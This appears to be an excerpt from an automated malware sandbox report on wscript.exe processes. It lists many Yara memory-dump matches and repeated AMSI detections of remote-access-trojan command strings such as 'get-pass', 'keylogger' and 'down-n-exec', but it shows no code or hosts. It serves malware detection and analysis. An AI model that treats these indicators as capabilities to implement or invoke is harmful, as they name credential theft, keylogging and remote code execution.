Source: Yara match File source: 00000004.00000002.854554678.0000020016790000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.831690125.0000029D80281000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.374542669.0000026E2A5EE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.312853725.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.438571195.0000026E2A5EE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.843784726.0000015319E3E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000003.513971058.0000015319E3E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.380177182.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.844278843.000001531A030000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000003.481502625.000001E45640E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.418142975.000002001662E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000003.394046563.0000029D80067000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.355045063.000002001662E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.439032554.0000026E2A5EE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.851874113.00000228B3130000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.374490943.0000026E2A5EE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.823248453.0000029D80067000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000003.444103192.0000015319E3E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.417946998.000002001662E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000003.444077557.0000015319E3E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.851673503.000002001662E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.845820210.0000026E2A5DA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.355010991.000002001662E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000003.514256730.0000015319E3E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.891143613.0000029DFD8AA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.847586711.000001E4568C0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000003.546431289.000001E45640E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000003.481574240.000001E45640E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: wscript.exe PID: 748, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: wscript.exe PID: 6100, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: wscript.exe PID: 2804, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: wscript.exe PID: 3232, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: wscript.exe PID: 2772, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: wscript.exe PID: 5776, type: MEMORYSTR

Remote Access Functionality

barindex
Source: Yara match File source: dump.pcap, type: PCAP
Source: Yara match File source: 00000002.00000003.346293587.0000025291B28000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.894056339.000001B9F4488000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000003.525478987.000001B9F4488000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000003.436933297.000001A3A0C9D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.882434337.000001B9F39C0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.359362375.0000020CC9D9D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000003.436804080.000001A3A0C8A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000003.475419032.000001B9F3810000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.306663834.0000023FB2AA9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.365466857.0000020CC9121000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.346110513.0000025291AEA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.345846246.0000025291B08000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000003.525911410.000001B9F4488000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000003.436967612.000001A3A0CC6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.362775717.0000020CC9DC5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.870934692.00000252913C0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.459088306.000001A3A05B0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.359178897.0000020CC9DA7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.360228659.0000020CC9120000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000003.524775302.000001B9F4488000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000003.442339424.000001A3A0CC6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.312164849.0000023FB2B5C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.364188132.0000020CC934C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.307173276.0000023FB2943000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.857351439.0000025290FE0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.890666886.000001B9F43C4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.306477021.0000023FB35AA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000003.473292279.000001B9F43D4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000003.437852144.000001A3A0010000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.306511935.0000023FB35C5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.347539680.0000025290E23000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.878368097.0000025291B0C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000003.525586861.000001B9F4488000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.311353679.0000023FB35E7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.307581623.0000023FB294F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.359292280.0000020CC9D8A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.346359959.0000025290FB6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000003.473654682.000001B9F43BB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000003.473826322.000001B9F43CB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.360037491.0000020CC9113000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000003.436996885.000001A3A01A5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.346253406.0000025291AFF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000003.443498942.000001A3A024C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000003.436753264.000001A3A0CA6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000003.473870911.000001B9F3994000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.359409394.0000020CC92A4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.347965187.0000025290E30000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000003.525101810.000001B9F4488000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.889666132.0000025291B7B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000003.475028155.000001B9F3803000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.380509963.0000020CC9C80000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.324728490.0000023FB34A0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.883442418.000001B9F3D60000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.839366000.0000025290DE0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: wscript.exe PID: 672, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: wscript.exe PID: 2332, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: wscript.exe PID: 1248, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: wscript.exe PID: 5292, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: wscript.exe PID: 1956, type: MEMORYSTR
Source: C:\Windows\System32\wscript.exe Anti Malware Scan Interface: Suspicious string up-n-exec
Source: C:\Windows\System32\wscript.exe Anti Malware Scan Interface: Suspicious string get-pass
Source: C:\Windows\System32\wscript.exe Anti Malware Scan Interface: Suspicious string down-n-exec
Source: C:\Windows\System32\wscript.exe Anti Malware Scan Interface: Suspicious string keylogger
Source: C:\Windows\System32\wscript.exe Anti Malware Scan Interface: Suspicious string take-log
Source: C:\Windows\System32\wscript.exe Anti Malware Scan Interface: Suspicious string up-n-exec
Source: C:\Windows\System32\wscript.exe Anti Malware Scan Interface: Suspicious string get-pass
Source: C:\Windows\System32\wscript.exe Anti Malware Scan Interface: Suspicious string down-n-exec
Source: C:\Windows\System32\wscript.exe Anti Malware Scan Interface: Suspicious string keylogger
Source: C:\Windows\System32\wscript.exe Anti Malware Scan Interface: Suspicious string take-log
Source: C:\Windows\System32\wscript.exe Anti Malware Scan Interface: Suspicious string up-n-exec
Source: C:\Windows\System32\wscript.exe Anti Malware Scan Interface: Suspicious string get-pass
Source: C:\Windows\System32\wscript.exe Anti Malware Scan Interface: Suspicious string down-n-exec
Source: C:\Windows\System32\wscript.exe Anti Malware Scan Interface: Suspicious string keylogger
Source: C:\Windows\System32\wscript.exe Anti Malware Scan Interface: Suspicious string take-log
Source: C:\Windows\System32\wscript.exe Anti Malware Scan Interface: Suspicious string up-n-exec
Source: C:\Windows\System32\wscript.exe Anti Malware Scan Interface: Suspicious string get-pass
Source: C:\Windows\System32\wscript.exe Anti Malware Scan Interface: Suspicious string down-n-exec
Source: C:\Windows\System32\wscript.exe Anti Malware Scan Interface: Suspicious string keylogger
Source: C:\Windows\System32\wscript.exe Anti Malware Scan Interface: Suspicious string take-log
Source: C:\Windows\System32\wscript.exe Anti Malware Scan Interface: Suspicious string up-n-exec
Source: C:\Windows\System32\wscript.exe Anti Malware Scan Interface: Suspicious string get-pass
Source: C:\Windows\System32\wscript.exe Anti Malware Scan Interface: Suspicious string down-n-exec
Source: C:\Windows\System32\wscript.exe Anti Malware Scan Interface: Suspicious string keylogger
Source: C:\Windows\System32\wscript.exe Anti Malware Scan Interface: Suspicious string take-log
Source: Yara match File source: 0000000E.00000002.845740262.000001E45640E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000003.546167949.000001E45640E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.848811043.0000026E2ADF0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.854554678.0000020016790000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.831690125.0000029D80281000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.374542669.0000026E2A5EE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.312853725.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.438571195.0000026E2A5EE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.843784726.0000015319E3E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000003.513971058.0000015319E3E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.380177182.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.844278843.000001531A030000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000003.481502625.000001E45640E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.418142975.000002001662E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000003.394046563.0000029D80067000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.355045063.000002001662E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.439032554.0000026E2A5EE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.851874113.00000228B3130000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.374490943.0000026E2A5EE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.823248453.0000029D80067000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000003.444103192.0000015319E3E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.417946998.000002001662E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000003.444077557.0000015319E3E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.851673503.000002001662E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.845820210.0000026E2A5DA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.355010991.000002001662E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000003.514256730.0000015319E3E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.891143613.0000029DFD8AA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.847586711.000001E4568C0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000003.546431289.000001E45640E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000003.481574240.000001E45640E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: wscript.exe PID: 748, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: wscript.exe PID: 6100, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: wscript.exe PID: 2804, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: wscript.exe PID: 3232, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: wscript.exe PID: 2772, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: wscript.exe PID: 5776, type: MEMORYSTR
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs